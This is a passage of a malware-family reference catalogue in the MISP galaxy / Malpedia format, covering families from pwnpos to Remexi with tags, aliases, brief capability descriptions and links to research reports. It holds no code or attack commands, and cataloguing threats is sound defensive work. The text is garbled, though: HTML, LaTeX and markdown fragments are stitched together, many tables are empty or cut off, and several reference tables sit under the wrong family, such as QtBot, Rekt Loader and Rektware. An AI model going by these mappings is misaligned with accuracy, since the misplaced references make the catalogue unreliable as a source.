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pwnpos

The tag is: misp-galaxy:malpedia="pwnpos"

pwnpos is also known as:

*Table 2312. Table References*

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<td><a href="https://twitter.com/physicaldrive0/status/573109512145649664">https://twitter.com/physicaldrive0/status/573109512145649664</a></td>
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**Pykspa**

The tag is: `misp-galaxy:malpedia="Pykspa"`

Pykspa is also known as:

Table 2313. Table References

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<td><a href="https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/">https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=HfSQLC76_s4">https://www.youtube.com/watch?v=HfSQLC76_s4</a></td>
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**PyLocky**

PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.

The tag is: `misp-galaxy:malpedia="PyLocky"`

PyLocky is also known as:

- Locky Locker

Table 2314. Table References

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**PyXie**

Full-featured Python RAT compiled into an executable.


The tag is: misp-galaxy:malpedia="PyXie"

PyXie is also known as:

- PyXie RAT

**Table 2315. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie">https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/">https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-dupont">https://www.secureworks.com/research/threat-profiles/gold-dupont</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/">https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/</a></td>
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**Qaccel**

The tag is: misp-galaxy:malpedia="Qaccel"

Qaccel is also known as:

**Table 2316. Table References**

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**Qadars**

The tag is: `misp-galaxy:malpedia="Qadars"`

Qadars is also known as:

Table 2317. Table References

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<td><a href="https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan">https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan</a></td>
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<td><a href="https://securityintelligence.com/an-analysis-of-the-qadars-trojan/">https://securityintelligence.com/an-analysis-of-the-qadars-trojan/</a></td>
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<tr>
<td><a href="https://www.johannesbader.ch/2016/04/the-dga-of-qadars/">https://www.johannesbader.ch/2016/04/the-dga-of-qadars/</a></td>
</tr>
</tbody>
</table>

**QakBot**

QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.

The tag is: `misp-galaxy:malpedia="QakBot"`

QakBot is also known as:

- Pinkslipbot
- Qbot
- Quakbot

Table 2318. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/">https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/</a></td>
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<td><a href="https://blog.quosec.net/posts/grap_qakbot_navigation/">https://blog.quosec.net/posts/grap_qakbot_navigation/</a></td>
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QHost

The tag is: misp-galaxy:malpedia="QHost"

QHost is also known as:

• Tolouge

Table 2319. Table References
QtBot

The tag is: misp-galaxy:malpedia="QtBot"

QtBot is also known as:

- qtproject

Table 2320. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost">https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost</a></td>
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QuantLoader

The tag is: misp-galaxy:malpedia="QuantLoader"

QuantLoader is also known as:

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<td><a href="https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quantloader-which-downloads-formbook/">https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quantloader-which-downloads-formbook/</a></td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
</tbody>
</table>

Quasar RAT

Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source
more difficult.

The tag is: \textit{misp-galaxy:malpedia="Quasar RAT"}

Quasar RAT is also known as:

- CinaRAT
- QuasarRAT
- Yggdrasil

\textit{Table 2322. Table References}

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat</a></td>
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<td><a href="https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage">https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage</a></td>
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<td><a href="https://blog.malwarelab.pl/posts/venom/">https://blog.malwarelab.pl/posts/venom/</a></td>
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<td><a href="https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape">https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape</a></td>
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<td><a href="https://blog.ensilo.com/uncovering-new-activity-by-apt10">https://blog.ensilo.com/uncovering-new-activity-by-apt10</a></td>
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<td><a href="https://blog.reversinglabs.com/blog/rats-in-the-library">https://blog.reversinglabs.com/blog/rats-in-the-library</a></td>
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Qulab

Qulab is an AutoIT Malware focusing on stealing & clipping content from victim’s machines.

The tag is: misp-galaxy:malpedia="Qulab"

Qulab is also known as:

Table 2323. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab

r980

The tag is: misp-galaxy:malpedia="r980"
r980 is also known as:

Table 2324. Table References

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<td><a href="https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/">https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/</a></td>
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</table>

**Raccoon**

Raccoon is a stealer and collects "passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies".

The tag is: *misp-galaxy:malpedia=*"Raccoon"

Raccoon is also known as:

- Mohazo
- RaccoonStealer
- Racealer
- Racoon

Table 2325. Table References

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<td><a href="https://www.riskiq.com/blog/labs/magecart-medialand/">https://www.riskiq.com/blog/labs/magecart-medialand/</a></td>
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Radamant

The tag is: `misp-galaxy:malpedia="Radamant"`

Radamant is also known as:

*Table 2326. Table References*

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RadRAT

The tag is: `misp-galaxy:malpedia="RadRAT"`

RadRAT is also known as:

*Table 2327. Table References*

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RagnarLocker

The tag is: `misp-galaxy:malpedia="RagnarLocker"`

RagnarLocker is also known as:

*Table 2328. Table References*

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</tbody>
</table>
Ragnarok

According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.

The tag is: misp-galaxy:malpedia="Ragnarok"

Ragnarok is also known as:

Table 2329. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok
Raindrop

Raindrop is a loader for Cobalt Strike that was observed in the SolarWinds attack.

The tag is: *misp-galaxy:malpedia=*Raindrop*

Raindrop is also known as:

*Table 2330. Table References*

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop


Rakhni

The tag is: *misp-galaxy:malpedia=*Rakhni*

Rakhni is also known as:

*Table 2331. Table References*

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni

https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/

Rambo

The tag is: *misp-galaxy:malpedia=*Rambo*

Rambo is also known as:

• brebsd

*Table 2332. Table References*

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo

https://www.secureworks.com/research/threat-profiles/bronze-overbrook
Ramdo

The tag is: misp-galaxy:malpedia="Ramdo"

Ramdo is also known as:

Table 2333. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo

Ramnit

The tag is: misp-galaxy:malpedia="Ramnit"

Ramnit is also known as:

• Nimnul

Table 2334. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit
http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html
https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/
https://www.youtube.com/watch?v=N4f2e8Mygag
https://redcanary.com/resources/webinars/deep-dive-process-injection/
https://research.checkpoint.com/ramnits-network-proxy-servers/
Ramsay

The tag is: `misp-galaxy:malpedia="Ramsay"`

Ramsay is also known as:

Table 2335. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay">https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay</a></td>
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<td><a href="https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/">https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/</a></td>
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<td><a href="https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html">https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=SKIu4LqMrns">https://www.youtube.com/watch?v=SKIu4LqMrns</a></td>
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Ranbyus

The tag is: `misp-galaxy:malpedia="Ranbyus"`

Ranbyus is also known as:

Table 2336. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus">https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus</a></td>
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<td><a href="https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/">https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/</a></td>
</tr>
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<td><a href="https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/">https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/</a></td>
</tr>
<tr>
<td><a href="http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html">http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html</a></td>
</tr>
<tr>
<td><a href="https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/">https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/</a></td>
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Ranscam

The tag is: `misp-galaxy:malpedia="Ranscam"`
Ranscam is also known as:

*Table 2337. Table References*

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam">https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam</a></td>
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<tr>
<td><a href="http://blog.talosintel.com/2016/07/ranscam.html">http://blog.talosintel.com/2016/07/ranscam.html</a></td>
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**Ransoc**

The tag is: *misp-galaxy:malpedia="Ransoc"

Ransoc is also known as:

*Table 2338. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc">https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc</a></td>
</tr>
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</table>

**RansomEXX (Windows)**

RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.

The tag is: *misp-galaxy:malpedia="RansomEXX (Windows)"

RansomEXX (Windows) is also known as:

- Defray777
- Ransom X

*Table 2339. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx">https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4">https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3">https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html">https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html</a></td>
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<tr>
<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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Ransomlock

The tag is: `misp-galaxy:malpedia="Ransomlock"`

Ransomlock is also known as:

- WinLock

*Table 2340. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock">https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock</a></td>
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<td><a href="https://forum.malekal.com/viewtopic.php?t=36485&amp;start=">https://forum.malekal.com/viewtopic.php?t=36485&amp;start=</a></td>
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</table>

Ransomware SNC

Ransomware SNC is a ransomware who encrypts files and asks for a variable amount of Bitcoin before releasing the decryption key to your files. The threat actor asks to be contacted for negotiating the right ransom fee.

The tag is: `misp-galaxy:malpedia="Ransomware SNC"`

Ransomware SNC is also known as:

*Table 2341. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc">https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc</a></td>
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Rapid Ransom

The tag is: misp-galaxy:malpedia="Rapid Ransom"

Rapid Ransom is also known as:

Table 2342. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom</a></td>
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<td><a href="https://twitter.com/malwrhunterteam/status/997748495888076800">https://twitter.com/malwrhunterteam/status/997748495888076800</a></td>
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<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/977275481765613569">https://twitter.com/malwrhunterteam/status/977275481765613569</a></td>
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<tr>
<td><a href="https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do">https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do</a></td>
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RapidStealer

The tag is: misp-galaxy:malpedia="RapidStealer"

RapidStealer is also known as:

Table 2343. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer</a></td>
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Rarog

The tag is: misp-galaxy:malpedia="Rarog"

Rarog is also known as:

Table 2344. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog">https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/">https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/</a></td>
</tr>
<tr>
<td><a href="https://tracker.fumik0.com/malware/Rarog">https://tracker.fumik0.com/malware/Rarog</a></td>
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rarstar

The tag is: misp-galaxy:malpedia="rarstar"

rarstar is also known as:

Table 2345. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar">https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></td>
</tr>
</tbody>
</table>

Ratankba

This is a backdoor that establishes persistence using the Startup folder. It communicates to its C&C server using HTTPS and a static HTTP User-Agent string. QUICKRIDE is capable of gathering information about the system, downloading and loading executables, and uninstalling itself. It was leveraged against banks in Poland.

The tag is: misp-galaxy:malpedia="Ratankba"

Ratankba is also known as:

- QUICKRIDE

Table 2346. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba">https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba</a></td>
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<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/nickel-gladstone">https://www.secureworks.com/research/threat-profiles/nickel-gladstone</a></td>
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<td><a href="http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html">http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html</a></td>
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<tr>
<td><a href="https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html">https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/PhysicalDrive0/status/828915536268492800">https://twitter.com/PhysicalDrive0/status/828915536268492800</a></td>
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<tr>
<td><a href="https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus(Constellation).pdf">https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus(Constellation).pdf</a></td>
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RatankbaPOS

The tag is: misp-galaxy:malpedia="RatankbaPOS"
RatankbaPOS is also known as:

- RATANKBAPOS

Table 2347. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos">https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos</a></td>
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<tr>
<td><a href="http://blog.trex.re.kr/3">http://blog.trex.re.kr/3</a></td>
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RatSnif

The tag is: misp-galaxy:malpedia="RatSnif"

RatSnif is also known as:

Table 2348. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif">https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/tin-woodlawn">https://www.secureworks.com/research/threat-profiles/tin-woodlawn</a></td>
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RawPOS

The tag is: misp-galaxy:malpedia="RawPOS"

RawPOS is also known as:

Table 2349. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos">https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos</a></td>
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<td><a href="https://www.youtube.com/watch?v=fevGZs0EQu8">https://www.youtube.com/watch?v=fevGZs0EQu8</a></td>
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</table>

RC2FM

A family identified by ESET Research in the InvisiMole campaign.

The tag is: misp-galaxy:malpedia="RC2FM"
RC2FM is also known as:

Table 2350. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm">https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm</a></td>
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RCS

The tag is: `misp-galaxy:malpedia="RCS"`

RCS is also known as:

- Crisis
- Remote Control System

Table 2351. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs">https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs</a></td>
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<td><a href="https://www.f-secure.com/documents/996508/1030745/callisto-group">https://www.f-secure.com/documents/996508/1030745/callisto-group</a></td>
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<td><a href="http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html">http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html</a></td>
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RCtrl

The tag is: `misp-galaxy:malpedia="RCtrl"`

RCtrl is also known as:

Table 2352. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl">https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl</a></td>
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rdasrv

The tag is: `misp-galaxy:malpedia="rdasrv"

rdasrv is also known as:

Table 2353. Table References

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RDAT

The tag is: `misp-galaxy:malpedia="RDAT"

RDAT is also known as:

- GREYSTUFF

Table 2354. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat">https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/">https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/</a></td>
</tr>
</tbody>
</table>

ReactorBot

Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.

The tag is: `misp-galaxy:malpedia="ReactorBot"

ReactorBot is also known as:

Table 2355. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot</a></td>
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<tr>
<td><a href="http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html">http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html</a></td>
</tr>
</tbody>
</table>
Reaver

Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the "Five Poisons" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.

The tag is: \textit{misp-galaxy:malpedia}="Reaver"

Reaver is also known as:

\textit{Table 2356. Table References}

\begin{tabular}{|l|}
\hline
\textbf{Links} \\
https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver \\
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\end{tabular}

RedAlpha

The tag is: \textit{misp-galaxy:malpedia}="RedAlpha"

RedAlpha is also known as:

\textit{Table 2357. Table References}

\begin{tabular}{|l|}
\hline
\textbf{Links} \\
https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha \\
https://www.recordedfuture.com/redalpha-cyber-campaigns/ \\
\hline
\end{tabular}

RedLeaves

The tag is: \textit{misp-galaxy:malpedia}="RedLeaves"

RedLeaves is also known as:

- BUGJUICE
RedLine Stealer

RedLine Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of Redliune added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.

The tag is: *misp-galaxy:malpedia="RedLine Stealer"*

RedLine Stealer is also known as:
### REDPEPPER

The tag is: misp-galaxy:malpedia="REDPEPPER"

REDPEPPER is also known as:

- Adupib

### RedRum Ransomware

The tag is: misp-galaxy:malpedia="RedRum Ransomware"

RedRum Ransomware is also known as:

- Grinch
- Thanos
- Tycoon
RED SAL T

The tag is: misp-galaxy:malpedia="RED SAL T"

RED SAL T is also known as:

• Dipsind

Table 2362. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt">https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt</a></td>
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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf">https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf</a></td>
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</table>

RED SHAWL

RED SHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.

The tag is: misp-galaxy:malpedia="RED SHAWL"

RED SHAWL is also known as:

Table 2363. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl">https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl</a></td>
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<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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Redyms

The tag is: misp-galaxy:malpedia="Redyms"

Redyms is also known as:

Table 2364. Table References

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<td>964</td>
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Red Alert

The tag is: misp-galaxy:malpedia="Red Alert"

Red Alert is also known as:

Table 2365. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert
https://twitter.com/JaromirHorejsi/status/816237293073797121

Red Gambler

The tag is: misp-galaxy:malpedia="Red Gambler"

Red Gambler is also known as:

Table 2366. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler

reGeorg

The tag is: misp-galaxy:malpedia="reGeorg"

reGeorg is also known as:

Table 2367. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg
https://sensepost.com/discover/tools/reGeorg/
https://github.com/sensepost/reGeorg

Regin

Regin is a sophisticated malware and hacking toolkit attributed to United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, telecom, government, and financial institutions. It was engineered to be modular and
over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.

The tag is: *misp-galaxy:malpedia="Regin"

Regin is also known as:

Table 2368. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.regin">https://malpedia.caad.fkie.fraunhofer.de/details/win.regin</a></td>
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<td><a href="https://www.youtube.com/watch?v=jeLd-gw2bWo">https://www.youtube.com/watch?v=jeLd-gw2bWo</a></td>
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<td><a href="https://www.epicturla.com/previous-works/hitb2020-voltron-sta">https://www.epicturla.com/previous-works/hitb2020-voltron-sta</a></td>
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<td><a href="https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/">https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/</a></td>
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<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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**RegretLocker**

The tag is: *misp-galaxy:malpedia="RegretLocker"

RegretLocker is also known as:

Table 2369. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker</a></td>
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<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/132137550217990536">https://twitter.com/malwrhunterteam/status/132137550217990536</a></td>
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</table>

**RekenSom Ransomware**

The tag is: *misp-galaxy:malpedia="RekenSom Ransomware"

RekenSom Ransomware is also known as:

- GHack Ransomware
Rekt Loader

The tag is: `misp-galaxy:malpedia="Rekt Loader"`

Rekt Loader is also known as:

Table 2371. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom">https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html">https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html</a></td>
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Rektware

The tag is: `misp-galaxy:malpedia="Rektware"`

Rektware is also known as:

- PRZT Ransomware

Table 2372. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader</a></td>
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<tr>
<td><a href="https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html">https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html</a></td>
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RemCom

The tag is: `misp-galaxy:malpedia="RemCom"`

RemCom is also known as:

- RemoteCommandExecution

Table 2373. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom">https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom</a></td>
</tr>
<tr>
<td><a href="https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef">https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef</a></td>
</tr>
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</table>
Remcos

Remcos (acronym of Remote Control & Surveillance Software) is a Remote Access Software used to remotely control computers. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos can be used for surveillance and penetration testing purposes, and in some instances has been used in hacking campaigns.

The tag is: misp-galaxy:malpedia="Remcos"

Remcos is also known as:

- RemcosRAT
- Remvio
- Socmer

Table 2374. Table References

<table>
<thead>
<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos">https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos</a></td>
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<td><a href="https://dissectingmalwa.re/malicious-ratatouille.html">https://dissectingmalwa.re/malicious-ratatouille.html</a></td>
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<td><a href="https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD">https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html">https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html</a></td>
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<td><a href="https://secracy.com/ReversingMalware/RemcosRAT/">https://secracy.com/ReversingMalware/RemcosRAT/</a></td>
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<td><a href="https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/">https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/</a></td>
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<td><a href="https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage">https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage</a></td>
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<td><a href="https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2">https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2</a></td>
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<td><a href="https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/">https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/</a></td>
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<td><a href="https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/">https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/</a></td>
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<tr>
<td><a href="http://malware-traffic-analysis.net/2017/12/22/index.html">http://malware-traffic-analysis.net/2017/12/22/index.html</a></td>
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Remexi

